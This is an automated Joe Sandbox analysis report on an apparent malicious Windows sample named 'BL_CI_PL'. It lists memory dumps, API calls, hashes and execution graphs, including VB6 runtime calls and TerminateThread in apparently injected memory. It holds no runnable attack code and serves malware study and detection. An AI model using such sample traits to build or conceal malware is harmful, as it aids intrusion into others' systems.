                                                                                                                                                      • Associated: 00000001.00000002.25495730315.0000000000423000.00000002.00020000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __vba$Free$Copy$Move$#536#587#606#714List
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 273173519-0
                                                                                                                                                      • Opcode ID: 619c58d87b8fe4f01bb7ea556dc5236fe84266fce0fd916c1cb3d71b7f9687a3
                                                                                                                                                      • Instruction ID: bfde619d84bb90be070530207f6e300fcc69702f38a34c5a455dbc29fa1c03b8
                                                                                                                                                      • Opcode Fuzzy Hash: 619c58d87b8fe4f01bb7ea556dc5236fe84266fce0fd916c1cb3d71b7f9687a3
                                                                                                                                                      • Instruction Fuzzy Hash: 7941A7B5C1021DABCB04DF94ED859DDBBB8FF98704F10811AE912B7264DB746A05CF94
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • __vbaFreeVarList.MSVBVM60(00000003), ref: 0041FE69
                                                                                                                                                      • __vbaNew2.MSVBVM60(004033AC,0042146C), ref: 0041FE85
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,02BEEA7C,0040339C,00000014), ref: 0041FEAA
                                                                                                                                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,004033E4,0000013C), ref: 0041FEF8
                                                                                                                                                      • __vbaFreeObj.MSVBVM60 ref: 0041FF01
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.25495522443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.25495499681.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000001.00000002.25495658109.000000000041C000.00000020.00020000.sdmp
                                                                                                                                                      • Associated: 00000001.00000002.25495704302.0000000000421000.00000004.00020000.sdmp
                                                                                                                                                      • Associated: 00000001.00000002.25495730315.0000000000423000.00000002.00020000.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: __vba$CheckFreeHresult$ListNew2
                                                                                                                                                      • String ID: srlove
                                                                                                                                                      • API String ID: 701738313-3382764130
                                                                                                                                                      • Opcode ID: fea6a7b0d1881d11062fc9a9eeba015c355c60c1b8c8cbc941345846f581bc2b
                                                                                                                                                      • Instruction ID: 418858752d4c2873a02f642b83f060fe3661e5cb0077d77064b8a6a3a28e02b2
                                                                                                                                                      • Opcode Fuzzy Hash: fea6a7b0d1881d11062fc9a9eeba015c355c60c1b8c8cbc941345846f581bc2b
                                                                                                                                                      • Instruction Fuzzy Hash: 83319271E00308AFDB14DFA4D985A9EBBB8EF48700F10802EE509F72A1D678550ACB59
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:0.1%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                      Total number of Nodes:22
                                                                                                                                                      Total number of Limit Nodes:1

                                                                                                                                                      Graph

                                                                                                                                                      execution_graph 66683 1e8f2b20 66685 1e8f2b2a 66683->66685 66686 1e8f2b3f LdrInitializeThunk 66685->66686 66687 1e8f2b31 66685->66687 66688 1e958305 66701 1e8f2b10 LdrInitializeThunk 66688->66701 66690 1e95834d 66693 1e9583c4 66690->66693 66702 1e8f0554 11 API calls 66690->66702 66692 1e9583ff 66693->66692 66703 1e8f2b90 LdrInitializeThunk 66693->66703 66695 1e95837b 66695->66693 66704 1e96fdce LdrInitializeThunk 66695->66704 66697 1e95841e 66697->66693 66705 1e8f2ed0 LdrInitializeThunk 66697->66705 66699 1e958430 66699->66693 66706 1e8f2da0 LdrInitializeThunk 66699->66706 66701->66690 66702->66695 66703->66692 66704->66697 66705->66699 66706->66693 66707 573a84 66708 573a8b 66707->66708 66708->66707 66709 573a5a TerminateThread 66708->66709 66710 573a71 66708->66710 66709->66710 66717 1e8f29f0 LdrInitializeThunk

                                                                                                                                                      Executed Functions

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 88fd6c9de44fb72efa7e9f7265ee54093d383d513705c5d4a0a2068e80adbb17
                                                                                                                                                      • Instruction ID: fc3192315acec6bd124f44b7ccf4842f654bf0b2b02bc553667b7fb4015ac7e1
                                                                                                                                                      • Opcode Fuzzy Hash: 88fd6c9de44fb72efa7e9f7265ee54093d383d513705c5d4a0a2068e80adbb17
                                                                                                                                                      • Instruction Fuzzy Hash: E790023130190402D510A159491474F405947D0702FD1C519A5258D15DC63588517971
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 2c04b6a548bb081448583b27eb85d4f77c3361fc09572b050241ba3206bcd828
                                                                                                                                                      • Instruction ID: c229757afbc08cb861b9a433bf2d4646d3d44038f2b20d48e84fc0771fe3f22a
                                                                                                                                                      • Opcode Fuzzy Hash: 2c04b6a548bb081448583b27eb85d4f77c3361fc09572b050241ba3206bcd828
                                                                                                                                                      • Instruction Fuzzy Hash: 49900231701500424550B169894494A80596BE17117D1C629A4A8CD10DC56988656A65
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 973e47f33a5af327bb4c05ef00d0f000f8761aa20ca0ed193a5b50d92bb5ea3e
                                                                                                                                                      • Instruction ID: 6f410dffa3302cff3b83860d36e2fcec3011bcfaab951589bf0e5c1d7217709f
                                                                                                                                                      • Opcode Fuzzy Hash: 973e47f33a5af327bb4c05ef00d0f000f8761aa20ca0ed193a5b50d92bb5ea3e
                                                                                                                                                      • Instruction Fuzzy Hash: E990027134150442D510A1594514B4A405987E1701FD1C51DE5158D14DC629CC527526
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: faf1d9b54e5bc383c84c6af35ed9f3dccb39e4457b13183b0da15d0d48a407fc
                                                                                                                                                      • Instruction ID: 01c156506c63684d655ef95a2344770b306a3f6baed16c291f0652bbf7a8a76e
                                                                                                                                                      • Opcode Fuzzy Hash: faf1d9b54e5bc383c84c6af35ed9f3dccb39e4457b13183b0da15d0d48a407fc
                                                                                                                                                      • Instruction Fuzzy Hash: ED900231311D0042D610A5694D14B4B405947D0703FD1C61DA4248D14CC92588616921
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 17edecefd54734d167448389fdb318cc658beaefaf543e2b71372a2d53da04d1
                                                                                                                                                      • Instruction ID: 487471a6aa0da6216f5802d91d96a7235c37ea1fa1e6975287abdd5d52ff4823
                                                                                                                                                      • Opcode Fuzzy Hash: 17edecefd54734d167448389fdb318cc658beaefaf543e2b71372a2d53da04d1
                                                                                                                                                      • Instruction Fuzzy Hash: 74900231342541525955F159450454B805A57E07417D1C51AA5508D10CC5369856EA21
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      control_flow_graph 206 1e8f2c30-1e8f2c3c LdrInitializeThunk
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      control_flow_graph 207 1e8f2c50-1e8f2c5c LdrInitializeThunk
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      control_flow_graph 204 1e8f2b90-1e8f2b9c LdrInitializeThunk
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      control_flow_graph 205 1e8f2bc0-1e8f2bcc LdrInitializeThunk
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      control_flow_graph 203 1e8f2b10-1e8f2b1c LdrInitializeThunk
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      control_flow_graph 202 1e8f29f0-1e8f29fc LdrInitializeThunk
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph (graph not preserved; first block 57395e-5739a0, TerminateThread called in block 5739db-573ad5)
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26187929412.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_573000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph (graph not preserved; first block 573987-57398e, TerminateThread called in block 5739db-573ad5)
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26187929412.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_573000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph (graph not preserved; first block 573a0a-573ad5, which calls TerminateThread)
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26187929412.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_573000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph (graph not preserved; first block 57393c-573942, TerminateThread called in block 5739a9-573ad5)
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26187929412.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_573000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph (graph not preserved; first block 5738e3-573942, TerminateThread called in block 5739a9-573ad5)
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26187929412.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_573000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph (graph not preserved; first block 573a80-573ac2, TerminateThread called in block 573a45-573a7b)
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26187929412.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_573000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph (graph not preserved; first block 573962-573967, TerminateThread called in block 5739a9-573ad5)
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26187929412.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_573000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      • Opcode ID: 7c3a70d7dcd81c978faa07d87a949652088e5ef89a3d63d85cc4c3f497c7897f
                                                                                                                                                      • Instruction ID: 8ddcd0d44c8858b006ed1bc30ba19ea6a6cafe3fc84304b6bbf551d67586afb2
                                                                                                                                                      • Opcode Fuzzy Hash: 7c3a70d7dcd81c978faa07d87a949652088e5ef89a3d63d85cc4c3f497c7897f
                                                                                                                                                      • Instruction Fuzzy Hash: 3B311631604252DFDB248E54D8A97EA3BA6BF51770F5AC16DCC895B096C3344EC8FB02
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      [Figure: control-flow graph for this function; legend: Executed / Not Executed]
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26187929412.0000000000573000.00000040.00000001.sdmp, Offset: 00573000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_573000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: TerminateThread
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1852365436-0
                                                                                                                                                      • Opcode ID: c6f1e5be929f483f9579e3e8ed077372cfd603a31de081788e27fe62399287d9
                                                                                                                                                      • Instruction ID: 2935a12e35e4fb019373a573e57aa9ab3b4d54fb8497dd3697fb2a6d5c38e061
                                                                                                                                                      • Opcode Fuzzy Hash: c6f1e5be929f483f9579e3e8ed077372cfd603a31de081788e27fe62399287d9
                                                                                                                                                      • Instruction Fuzzy Hash: 2821D5356002069FDB258E10D4A9BE57F96BF51774F4AC29DC4890B095C3388EC9FB02
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      [Figure: control-flow graph for this function; legend: Executed / Not Executed]
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: f7826e858ca1f3195d9b112b58a1f64a87ef3b72ce635aaa4abc96c06aea18fd
                                                                                                                                                      • Instruction ID: 0526cdf0536bf8354c8339042182d7e75aed50185f2fbedb0ad8df34d479ccf0
                                                                                                                                                      • Opcode Fuzzy Hash: f7826e858ca1f3195d9b112b58a1f64a87ef3b72ce635aaa4abc96c06aea18fd
                                                                                                                                                      • Instruction Fuzzy Hash: 77B02B319014C1C5D600D720070870B790467C0B01F51C115D1020A00EC338C090F231
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Non-executed Functions

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebugPrintTimes
                                                                                                                                                      • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                      • API String ID: 3446177414-1700792311
                                                                                                                                                      • Opcode ID: 0af8edec5393ccbb994a6fa1d6aafb7640d0cf89052f3e08e6b32a6d259a23f6
                                                                                                                                                      • Instruction ID: 2c0afd6589bc538a8f1c5e1512e9740959f9036e46fc9fb43d9b47aa75b8d8d2
                                                                                                                                                      • Opcode Fuzzy Hash: 0af8edec5393ccbb994a6fa1d6aafb7640d0cf89052f3e08e6b32a6d259a23f6
                                                                                                                                                      • Instruction Fuzzy Hash: 4DD1F335504685DFCB22CFA8C490AADBBF6FF89310F048A5EE8459B752D735A981CF10
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000A.00000002.26199655725.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000000A.00000002.26201422236.000000001E9A9000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 0000000A.00000002.26201492400.000000001E9AD000.00000040.00000001.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_10_2_1e880000_BL_CI_PL.jbxd
